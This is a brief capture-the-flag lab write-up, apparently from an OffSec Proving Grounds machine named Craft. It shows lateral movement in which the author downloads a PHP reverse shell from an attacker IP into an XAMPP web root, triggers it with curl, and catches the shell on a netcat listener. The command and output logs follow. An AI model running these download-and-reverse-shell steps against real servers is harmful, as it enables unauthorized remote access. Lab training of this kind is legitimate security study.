Craft_Lateral_Movement_apache

apache

---

The current user, thecybergeek, has write access to the web root directory; C:\xampp\htdocs

PS C:\xampp\htdocs> iwr -Uri http://192.168.45.197/shell.php -Outfile C:\xampp\htdocs\shell.php

Transferring the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ curl http://craft.offsec/shell.php

Invoking..

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ nnc 6666
listening on [any] 6666 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.169] 50133
SOCKET: Shell has connected! PID: 1736
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs> whoami
craft\apache
 
C:\xampp\htdocs> hostname
CRAFT
 
C:\xampp\htdocs> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::2cf0:b138:c2e1:e87b%5
   IPv4 Address. . . . . . . . . . . : 192.168.138.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.138.254

Lateral Movement made to the apache account via writing a PHP reverse shell to the web root directory